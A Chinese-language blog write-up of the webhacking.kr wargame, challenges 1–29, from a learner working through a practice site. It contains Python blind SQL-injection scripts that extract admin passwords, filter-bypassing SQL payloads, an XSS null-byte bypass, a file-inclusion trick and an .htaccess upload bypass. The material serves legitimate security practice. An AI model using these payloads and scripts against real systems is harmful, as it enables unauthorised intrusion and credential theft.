Webhacking.kr writeup（更新至challenge 29）

Webhacking.kr writeup

先附上题目的链接

http://webhacking.kr

challenge 1

第一个先看源码，

<a onclick=location.href='index.phps'>----- index.phps -----</a>

先有一个跳转，跟过去看看

又得到了一些源码，重点的如下：

<?

$password="????";

if(eregi("[^0-9,.]",$_COOKIE[user_lv])) $_COOKIE[user_lv]=1;

if($_COOKIE[user_lv]>=6) $_COOKIE[user_lv]=1;

if($_COOKIE[user_lv]>5) @solve();

echo("<br>level : $_COOKIE[user_lv]");

?>

这里很容易就看出把

cookie

中的user_lv随便一个5-6之间的小树就可以了，所以直接抓包修改就行了

challenge 2

好吧这道题。。半知半解加上猜测勉强算是做出来。

回到正题。

点进去是这个样子



然后开始找线索，注意，该页的源码里面发现了很关键的东西



这就是那条龙对应的连接，点一下就进到了登录admin的界面



试了试没法儿注入，然后还发现了这里有个关键的东西：



又是要密码，试了试也没有可以注入的迹象，然后整个人都好了，看了题解之后（韩文题解，只能看懂图，爽翻。。。）

说是首页这里有问题



首页时

间注释掉了，然后通过抓包



试试这里有没有问题，把这里改成如下：

time=1460468419 and 1=1

发现时间变成了



那么再试试

time=1460468419 or 1=0

所以这里是存在盲注的，那么就可以尝试爆一点东西出来，

由于无法判断是什么数据库，自然也不好直接爆，顶多爆一下库名之类没什么卵用的东西。这里主要是猜想刚才那个admin界面的表对应是admin表，然后猜解他的password字段，

对应的python代码也比较简单，贴一贴吧

import requests
import re
db_length=-1
db_name=""
url = 'http://webhacking.kr/challenge/web/web-02/index.php'
r=requests.session()
def doinject(param):
header={"Cookie":"time="+param+";PHPSESSID=58ltk3o56jd4ug007chbiorne3"}
result=r.get(url,headers=header)
content=result.content
#print content
if "09:00:01" in content:
return 1
return 0

def get_admin_pass():
global db_length
global db_name
for i in xrange(100):
param="1460468419 and if((select length(password) from admin)="+str(i)+",1,0)"
if doinject(param):
db_length=i
break
print db_length

for i in xrange(1,db_length+1):
start=48
end=122
while(start!=end):
#print str(start)+" : "+str(end)
if(end-start==1):
param="1460468419 and if(ascii(substr((select password from admin),"+str(i)+",1))="+str(start)+",1,0)"
if(doinject(param)):
end=start
else:
start=end
else:
mid=(start+end)/2
param="1460468419 and if(ascii(substr((select password from admin),"+str(i)+",1))>="+str(mid)+",1,0)"
if(doinject(param)):
start=mid
else:
end=mid
db_name+=chr(start)
print db_name
print db_name
get_admin_pass()

所以密码就是

0nly_admin

。

那么用这个密码去登录admin页面，得到提示：



（尼玛啊，韩文提示你大爷的。。。。百度谷歌翻译一下把）

好歹告诉了一个什么密码还是什么的东西吧。试了试不是board处的密码。

好吧，到这里就怼不动了，看看题解，发现莫名其妙的脑洞第二个表名



已跪好吧！

有了第二个表名，又来猜密码，代码都不用变，直接把表名换成

FreeB0aRd

就可以了，真是烦，浪费我这么多时间，结果是个脑洞。



所以

board

处的密码就是

7598522ae

。

输入之后出现个链接，给了个zip，

__AdMiN__FiL2.zip

，打开，是一个html文件



好吧，这个是有解压密码的，突然想到刚才在admin界面拿到的提示还没有用，那个密码

@dM1n__nnanual

，输入进去果然成功解压了！打开html文件

卧槽卧槽，终于出来了



所以flag就是这个了，

HacKed_by_n0b0dY

，好吧这道题我已经报警了，浪费了我整整快一天时间了。。。结果就尼玛脑洞过来的（好吧，可能是因为看不懂韩文，没有找到hint的位置吧）

然后去提交就行了。

challenge 3

打开就是这样一个网页



然后简单看看，只有右下角的5*5格子可以操作，看看源码也并没有什么有价值的东西

然后观察格子，最后猜测，就是每一行或每一列对应的就是我们应该画上的黑格子的数量，比如一个3，我们就要画三个连续的黑格子，比如111，我们就要画三个间隔的黑格子，所以试了试之后，如下：



出现一个输入框，先抓包看看，也没有什么异样，尝试注入，发现answer字段这里有注入的迹象



试了试之后，发现像是

'

,

or

,

#

等等都被过滤了，最后成功的payload就是这个



用

||

代替

or

，所以根据返回来看，答案就是

new_sql_injection

这个了

challenge 4

一看先是个base64解码，然后又是sha1解密，接着还是sha1解密

比较简单，最后答案就是

test

不做赘述

challenge 5

这道题应该是比较简单的了，我觉得明明应该是对的但还是出不来，浪费了不少时间，这里先不写，回头再来补把。

challenge 6

看源码，一堆替换，第一部分php代码就是当我们没有设定cookie的时候它会自动生成，这部分不用管。重点是第二部分，

$decode_id=$_COOKIE[user];
$decode_pw=$_COOKIE[password];

$decode_id=str_replace("!","1",$decode_id);
$decode_id=str_replace("@","2",$decode_id);
$decode_id=str_replace("$","3",$decode_id);
$decode_id=str_replace("^","4",$decode_id);
$decode_id=str_replace("&","5",$decode_id);
$decode_id=str_replace("*","6",$decode_id);
$decode_id=str_replace("(","7",$decode_id);
$decode_id=str_replace(")","8",$decode_id);

$decode_pw=str_replace("!","1",$decode_pw);
$decode_pw=str_replace("@","2",$decode_pw);
$decode_pw=str_replace("$","3",$decode_pw);
$decode_pw=str_replace("^","4",$decode_pw);
$decode_pw=str_replace("&","5",$decode_pw);
$decode_pw=str_replace("*","6",$decode_pw);
$decode_pw=str_replace("(","7",$decode_pw);
$decode_pw=str_replace(")","8",$decode_pw);

for($i=0;$i<20;$i++)
{
$decode_id=base64_decode($decode_id);
$decode_pw=base64_decode($decode_pw);
}

echo("<font style=background:silver;color:black>  HINT : base64  </font><hr><a href=index.phps style=color:yellow;>index.phps</a><br><br>");
echo("ID : $decode_id<br>PW : $decode_pw<hr>");

if($decode_id=="admin" && $decode_pw=="admin")
{
@solve(6,100);
}

一开始的替换也没什么用，接着是base64解密20次，解密之后的值如果和

admin

相等的话，那么解决问题。

这个就比较简单了，我们把

admin

base64加密20次不就完了么，如下：

import base64
a = "admin"
for i in xrange(20):
a=base64.b64encode(a)
print a

然后把生成的一大串东西抓包替换掉原有cookie中的

user

和

password

就行了。

challenge 7

这里源码在index.phps下面，我摘录了比较重要的部分

........
........
if(eregi("--|2|50|\+|substring|from|infor|mation|lv|%20|=|!|<>|sysM|and|or|table|column",$ck)) exit("Access Denied!");

if(eregi(' ',$ck)) { echo('cannot use space'); exit(); }
........
........
if($data[0]==2)
{
echo("<input type=button style=border:0;bgcolor='gray' value='auth' onclick=
alert('Congratulation')><p>");
@solve();
}

这里的随机数没有必要去想办法绕过，只要找到绕过过滤的方法，多试几次，总用一次随机数能够和你的payload对上，

这里主要是注意下过滤了空格和2，其实有很多种替换方法，比如

/**/

,或是编码

%0a

,2的话就可以变成3-1,所以构造的

payload

如下：

http://webhacking.kr/challenge/web/web-07/index.php?val=0)%0aunion%0aselect%0a(3-1

然后多尝试几次就好了，或是写个简单的脚本：

#-+- coding:utf-8 -+-
import requests
url='http://webhacking.kr/challenge/web/web-07/index.php?val=0)%0aunion%0aselect%0a(3-1'
param={'Cookie':'PHPSESSID=iajr6agbpqaijt379p1ef14ip4'};
num=0;
while True:
r=requests.get(url,headers=param)
num+=1
print num
content = r.content
if 'nice try!' not in content:
print content
break;

challenge 8

这道题的源代码也在index.phps下面，这里就是一个比较基础的二次注入。

这里我把重要的分析写在源码里面了，源码如下：

$agent=getenv("HTTP_USER_AGENT");
$ip=$_SERVER[REMOTE_ADDR];
$agent=trim($agent);
$agent=str_replace(".","_",$agent);
$agent=str_replace("/","_",$agent);
//这里各种匹配，但是关键的单引号是可以使用的
$pat="/\/|\*|union|char|ascii|select|out|infor|schema|columns|sub|-|\+|\||!|update|del|drop|from|where|order|by|asc|desc|lv|board|\([0-9]|sys|pass|\.|like|and|\'\'|sub/";
$agent=strtolower($agent);
if(preg_match($pat,$agent)) exit("Access Denied!");

//这里又重新获取了一次user-agent，然后把单引号和双引号都怼掉了，不能用了，所以这里没办法注入了
$_SERVER[HTTP_USER_AGENT]=str_replace("'","",$_SERVER[HTTP_USER_AGENT]);
$_SERVER[HTTP_USER_AGENT]=str_replace("\"","",$_SERVER[HTTP_USER_AGENT]);
$count_ck=@mysql_fetch_array(mysql_query("select count(id) from lv0"));
if($count_ck[0]>=70) { @mysql_query("delete from lv0"); }
//没办法直接注入的，因为单引号到此为止已经被匹配掉了
$q=@mysql_query("select id from lv0 where agent='$_SERVER[HTTP_USER_AGENT]'");
$ck=@mysql_fetch_array($q);
if($ck)
{
echo("hi <b>$ck[0]</b><p>");
if($ck[0]=="admin")

{
@solve();
@mysql_query("delete from lv0");
}

}
//注入点在这里，变量$agent是可以有单引号的，而且是我们可以控制的。所以我们可以先把admin账户插入进去，然后在访问admin就行了
if(!$ck)
{
$q=@mysql_query("insert into lv0(agent,ip,id) values('$agent','$ip','guest')") or die("query error");
echo("<br><br>done!  ($count_ck[0]/70)");
}
?>

所以第一次我们先截包把

user-agent

改成如下：

admin','1','admin')#

这样子执行下来，就成功把这行记录插入到了lv0表中去了。

然后我们再截一次包，直接把

user-agent

改成

admin

就成功了。

两次截图如下：

challenge 9

这里一点开是个这样子的东西，截了个包发现是这么个情况，



典型的Basic Authorization验证的，这里怎么输入密码都没有，几次尝试之后应该是不存在注入的，然后脑动一下换一个请求方式，

改成POST也不行，改成PUT一下子就进去了。

应该是这个网站限定了不能使用GET和POST，那么我们再burpsuite里设定一下，将所有包的GET请求都替换成PUT，



这里不懂的可以看一下我之前的介绍burpsuite的博客

/article/7556269.html

然后知道当

no=1的时候回显的是apple
no=2的时候回显的是banana
np=3的时候是未知的，并给了提示

那么我们得想办法爆出no=3的时候的id是啥。

进过多次尝试之后，发现很多都被过滤掉了，最后试出的payload如下：

if(substr(id,1,1)in(0x41),3,0)

然后写了个脚本爆破一下id，如下：

import requests
url = "http://webhacking.kr/challenge/web/web-09/"
r=requests.session()
pw=""

def doinject(param):
headers = {"Cookie" : "PHPSESSID=brbg4rmf75uvj2gv4ff3n090i2"}
payload="no="+param
result=r.put(url,params=payload,headers=headers)
content=result.content
#print content
if "Secret" in content:
return 1
return 0

for x in xrange(1,12):
for y in xrange(32,127):
param="if(substr(id,"+str(x)+",1)in("+hex(y)+"),3,0)"
if doinject(param)>0:
pw += chr(y)
print pw
break
print pw

得到如下：



然后试了试，没有成功，全部变成小写，成功了，所以最后的密码就是

alsrkswhaql

challenge 10

这道题源代码如下：

<html>
<head>
<title>Challenge 10</title>
</head>

<body>
<hr style=height:100;background:brown;>
<table border=0 width=900 style=background:gray>
<tr><td>
<a id=hackme style="position:relative;left:0;top:0" onclick="this.style.posLeft+=1;if(this.style.posLeft==800)this.href='?go='+this.style.posLeft" onmouseover=this.innerHTML='yOu' onmouseout=this.innerHTML='O'>O</a><br>
<font style="position:relative;left:800;top:0" color=gold>|<br>|<br>|<br>|<br>buy lotto</font>
</td></tr>
</table>
<hr style=height:100;background:brown;>

</body>
</html>

读懂js的意思，就是

this.style.posLeft==800

时访问

http://webhacking.kr/challenge/codeing/code1.html?go=800

，那我们直接访问，弹出no hack，那么这里抓个包没有发现什么异样，那就多半是

Referer

了，把

Referer

跟上，成功！

challenge 11

这里一开始看到正则如下：

$pat="/[1-3][a-f]{5}_.*218.29.102.122.*\tp\ta\ts\ts/";
if(preg_match($pat,$_GET[val])) { echo("Password is ????"); }

意思就是一个匹配，匹配到就成功了，

你找一个在线测试的网站试几次就行了，这也是比较基础的正则，最后结果如下：

1aaaaa_11218129110211221111 p   a   s   s

注意要URL编码一下，答案如下：

http://webhacking.kr/challenge/codeing/code2.html?val=1aaaaa_11218129110211221111%09p%09a%09s%09s

challenge 12

一道js解密的题，把源码直接全部复制到本地，然后将脚本中的

eval

改成

document.write

，放到浏览器里源代码就出来了，然后格式化一下如下：

var enco = '';
var enco2 = 126;
var enco3 = 33;
var ck = document.URL.substr(document.URL.indexOf('='));
for (i = 1; i < 122; i++) {
enco = enco + String.fromCharCode(i, 0);
}
function enco_(x) {
return enco.charCodeAt(x);
}
if (ck == "=" + String.fromCharCode(enco_(240)) + String.fromCharCode(enco_(220)) + String.fromCharCode(enco_(232)) + String.fromCharCode(enco_(192)) + String.fromCharCode(enco_(226)) + String.fromCharCode(enco_(200)) + String.fromCharCode(enco_(204)) + String.fromCharCode(enco_(222 - 2)) + String.fromCharCode(enco_(198)) + "~~~~~~" + String.fromCharCode(enco2) + String.fromCharCode(enco3)) {
alert("Password is " + ck.replace("=", ""));
}

这里直接

alert

一下这一就出来了

String.fromCharCode(enco_(240)) + String.fromCharCode(enco_(220)) + String.fromCharCode(enco_(232)) + String.fromCharCode(enco_(192)) + String.fromCharCode(enco_(226)) + String.fromCharCode(enco_(200)) + String.fromCharCode(enco_(204)) + String.fromCharCode(enco_(222 - 2)) + String.fromCharCode(enco_(198)) + "~~~~~~" + String.fromCharCode(enco2) + String.fromCharCode(enco3)

所以得到答案就是

youaregod~~~~~~~!

去首页提交一下就好了。

challenge 13

一道很直接的SQL注入题，有个hint是

select flag from prob13password

简单尝试了一下，发现可以用bool盲注，输入1的时候如下：



而别的输入要么无反应，要么返回0。

这里试了一会儿，发现很多很多都被过滤了，不过select可以用的，然后像是union、and、|、&、空格、=，都被过滤了。空格这里只能用%0a代替，连

/**/

都被过滤了。

但是还有两个盲注很关键的东西没有过滤，if和substr，然后试到这里我们可以想到构造如下

payload

0%0aor%0aif(substr((select%0aflag%0afrom%0aprob13password),1,1)in("0x41"),1,0)

发现并没有回显，然后多次更改来回尝试之后，发现是flag字段的问题，比如我们尝试这样子的语句

0%0aor%0aif(substr((select%0aflag%0afrom%0aprob13password),1,1)in("0x41"),1,1)

也就是说if语句永远返回1，但是最后还是没有回显，说明问题出在flag字段上，当我们换成这样子

0%0aor%0aif(substr((select%0acount(flag)%0afrom%0aprob13password),1,1)in("0x41"),1,1)

于是有了回显，然后我们就意识到那个flag字段不能单独用，那就想想SQL有哪些聚合函数，最后折腾之后，想到了MAX()和MIN()函数，然后可以用substr(min(flag),1,1)代替原有的单独flag字段绕开过滤，这样子我们就一个个爆出了min(flag)的值（注意，这里MAX(flag)的值经过爆破得到是

FLAG

，不是最后答案）

然后写个脚本，由于是顺序猜解，速度比较慢，代码如下：

import requests
url = "http://webhacking.kr/challenge/web/web-10/"
r=requests.session()
pw=""

def doinject(param):
headers = {"Cookie" : "PHPSESSID=brbg4rmf75uvj2gv4ff3n090i2"}
payload="no="+param
result=r.get(url,params=payload,headers=headers)
content=result.content
#print content
if "<tr><td>1</td></tr>" in content:
return 1
return 0

for x in xrange(1,25):
for y in xrange(32,127):
param="0%0aor%0aif(substr((select%0asubstr(min(flag),"+str(x)+",1)%0afrom%0aprob13password),1,1)in("+hex(y)+"),1,0)"
#print str(x)+" : "+hex(y)
if doinject(param)>0:
pw += chr(y)
print pw
break
print pw

结果如下图



所以最后的答案就是

challenge13luckclear

challenge 14

源代码如下：

function ck()
{
var ul=document.URL;
ul=ul.indexOf(".kr");
ul=ul*30;
if(ul==pw.input_pwd.value) { alert("Password is "+ul*pw.input_pwd.value); }
else { alert("Wrong"); }
}

这里直接放到firebug里面调试下就知道了，如下图：



得到值是510，所以输入510就是最后答案了，随后得到如下：



所以最后的答案就是260100，首页提交即可

challenge 15

这里再弹窗回跳的时候，答案就出来了的，随便拦截一下包就看到了



首页提交即可

challenge 16

这道题也是比较简单的js题，代码如下：

<html>
<head>
<title>Challenge 16</title>
<body bgcolor=black onload=kk(1,1) onkeypress=mv(event.keyCode)>
<font color=silver id=c></font>
<font color=yellow size=100 style=position:relative id=star>*</font>
<script>
document.body.innerHTML+="<font color=yellow id=aa style=position:relative;left:0;top:0>*</font>";

function mv(cd)
{
kk(star.style.posLeft-50,star.style.posTop-50);
if(cd==100) star.style.posLeft=star.style.posLeft+50;
if(cd==97) star.style.posLeft=star.style.posLeft-50;
if(cd==119) star.style.posTop=star.style.posTop-50;
if(cd==115) star.style.posTop=star.style.posTop+50;
if(cd==124) location.href=String.fromCharCode(cd);
}

function kk(x,y)
{
rndc=Math.floor(Math.random()*9000000);
document.body.innerHTML+="<font color=#"+rndc+" id=aa style=position:relative;left:"+x+";top:"+y+" onmouseover=this.innerHTML=''>*</font>";
}

</script>
</body>
</html>

看到就是

mv

函数最后当cd==124的时候大概就是我们需要的东西，所以直接构造就行了，在firebug加个事件就行了，把他的这个

onkeypress=mv(event.keyCode)

改成

onmouseover=mv(124)

,鼠标挪过去，就得到了如下：



直接去首页提交就行了。

challenge 17

直接放在firebug的console下运行即可，如下得到unlock的值，



然后的得到

unlock

的值，填入得到答案为

999780930.7

，首页提交即可

challenge 18

这道题给出了源码，如下：

<?
if($_GET[no])
{
if(eregi(" |/|\(|\)|\t|\||&|union|select|from|0x",$_GET[no])) exit("no hack");
$q=@mysql_fetch_array(mysql_query("select id from challenge18_table where id='guest' and no=$_GET[no]"));
if($q[0]=="guest") echo ("hi guest");
if($q[0]=="admin")
{
@solve();
echo ("hi admin!");
}
}
?>

有一个简单的过滤，像是or这种关键的词没有过滤就很好办了，payload如下：

1%0aor%0a1%0alimit%0a1,1

让where永真，然后通过limit语句控制选中

admin

即可

challenge 19

这道题出的有的莫名其妙的，只是简单的试了试，虽然不知道原因，不过就做出来了。

在尝试的时候先是截包，然后修改

admin'

，发现不行，接着是

admin%27

也不行，然后又试了试

admin%2527

，发现打印了

admin27

，那么就意味着中间的%25被河蟹了，那么说我直接输入

admin%25

也应该可以的吧。然后果然就成功了，这就是说答案也可以是

admin%

，后来想了想，可能是通配符的缘故，然后果断试了试

admin*

果然也成功了。这道题就先这样了吧。

challenge 20

好吧这道题。。。。。

时限是2s，然后应该就是简单的输入两个几个值，关键就是怎么2s交上去，然后又说了不是编程，提示是JS，那么就在firebug的console里面搞就行了，如下：

lv5frm.id.value='123';
lv5frm.cmt.value='123';
lv5frm.hack.value=lv5frm.attackme.value;
lv5frm.submit();

多刷新几次就成功了！

challenge 21

做完之后没有保存，懒得再写了。

challenge 22

这道题一来是直接可以盲注的，一个id字段。另一个也很好猜，就是pw字段。

它在login界面有两种回显，一种是



另一种就是这个



依靠这个我们可以开始盲注，贴一下脚本吧：

import requests
url = "http://webhacking.kr/challenge/bonus/bonus-2/index.php"
r=requests.session()
pw=""

def doinject(param):
headers = {"Cookie" : "PHPSESSID=pcpmvjp3vc020q2ebsd7p6mkc6"}
payload={"id":param}
#print payload
result=r.post(url,data=payload,headers=headers)
content=result.content
#print content
if "Wrong password!" in content:
return 1
return 0

for x in xrange(1,33):
for y in xrange(32,127):
param="admin' and if(substr(pw,"+str(x)+",1)='"+chr(y)+"',1,0)#"
#print param
#print str(x)+" : "+chr(y)
if doinject(param)>0:
pw += chr(y)
print pw
break
print pw

运行结果如下：



所以

admin

的密码的md5就是

2a93a7cea083c6e9e02c97ec5a5d715a

，去解码下得到原文是

rainbowzombie

。

提交答案但是不对，那么问题来了。。

确实，join页面我们还没有使用过。。

我们先随便join一个账户名和密码都是

1

的，成功之后去登录



得到了密码的hash，解码之后的值是

1zombie

，很容易意识到网页在MD5进行hash的时候是加了salt的，这样子，刚刚盲注得到的

rainbowzombie

中真正的密码就是

rainbow

。

challenge 23 (XSS)

一直不怎么会XSS，这道题也是比较奇怪，一旦

<

后面匹配到sc、in、on什么的直接报no hack，想到用%00截断一下，结果直接就过了

<s%00cript>alert(1);</script>

challenge 24

根据提示进入

index.phps

看到源码，这里就不贴了，它会从cookie里面获取名为

REMOTE_ADDR

的值，然后关机的过滤如下：

if($_COOKIE[REMOTE_ADDR])
{
$ip=str_replace("12","",$ip);
$ip=str_replace("7.","",$ip);
$ip=str_replace("0.","",$ip);
}

根据上面的代码，构造一个

REMOTE_ADDR=112277..00..00..1

既可以绕过了。

然后截包在cookie里面添加上

REMOTE_ADDR=112277..00..00..1

就可以了。

challenge 25

好吧这道题真是奇怪。。哔了狗了。。这道题一进去看到连接file=hello，知道肯定是hello.txt的内容，然后直接试试index.php%00,发现还是看到显示

hello world

，我还以为%00截断不行。。最后还是就是直接的

password.php%00

，它的坑点就在于那个该死的index.php里面的内容和hello.txt一样都是

hello world

。坑了我半天，擦。

Challenge 25 password is ~~nullbye2~~

答案是

~~nullbye2~~

challenge 26

题目越来越简单的感觉，看源码如下：

if(eregi("admin",$_GET[id])) { echo("<p>no!"); exit(); }
$_GET[id]=urldecode($_GET[id]);
if($_GET[id]=="admin")
{
@solve(26,100);
}

中间代码进行了一次url解码，那么我们直接对

admin

两次url编码就可以了，paylaod

http://webhacking.kr/challenge/web/web-11/index.php?id=%2561%2564%256D%2569%256E

challenge 27

同样在index.phps下面看到源代码

<?php
if($_GET[no])
{
if(eregi("#|union|from|challenge|select|\(|\t|/|limit|=|0x",$_GET[no]))     exit("no hack");
$q=@mysql_fetch_array(mysql_query("select id from challenge27_table where id='guest' and no=($_GET[no])")) or die("query error");
if($q[id]=="guest") echo("guest");
if($q[id]=="admin") @solve();
}
?>

看到

union

和

select

都被过滤了，那么就多半不是union查询了，然后看看

mysql_fetch_array

，知道它是去除结果集中的一条记录，那么就想到了把中所有内容选出来排序，这样在执行

mysql_fetch_array

函数的时候，就能把

admin

那条记录取走。

payload如下：

http://webhacking.kr/challenge/web/web-12/index.php?no=-1) or 1 order by id asc--+

challenge 28

一开始，先访问下

upload/index.php

，看到一个

read me

，然后看到最开始的提示，

pw

的值在index.php里面看到，然后随便上传一个文件



看到这样的提示，提示

.htaccess

，然后就知道应该是把

upload

目录下的php禁用掉，这样子我们就能够下载下来

upload/index.php

，就能够拿到pw了，所以我们创建一个

.htaccess

，内容就是

php_flag engine off

上传上去，然后就成功了。

challenge 29

这道题提示是个注入什么的，还是先随便上传个文件，发现成功之后会把

time,ip,file

存入数据库什么的，然后从中选入，应该是一个

update

，注入点多半就在

filename

这里，那么我们预估一下这个表就是3个字段，试了很多次之后，发现它的插入顺序是“file，time，ip”，这里用Burpsuite就可以抓包看到filename然后开始注入，而且还要注意的是，ip一定要和你自己ip一样，就是随便上传一个文件就能看到自己的ip，由于过滤了

.

，所以需要用到数据库的

CHAR()

函数,如下图：



最后试出来的payload是这个:

2',(select password from c29_tb),CHAR(50, 49, 56, 46, 50, 57, 46, 49, 48, 50, 46, 49, 48, 50))#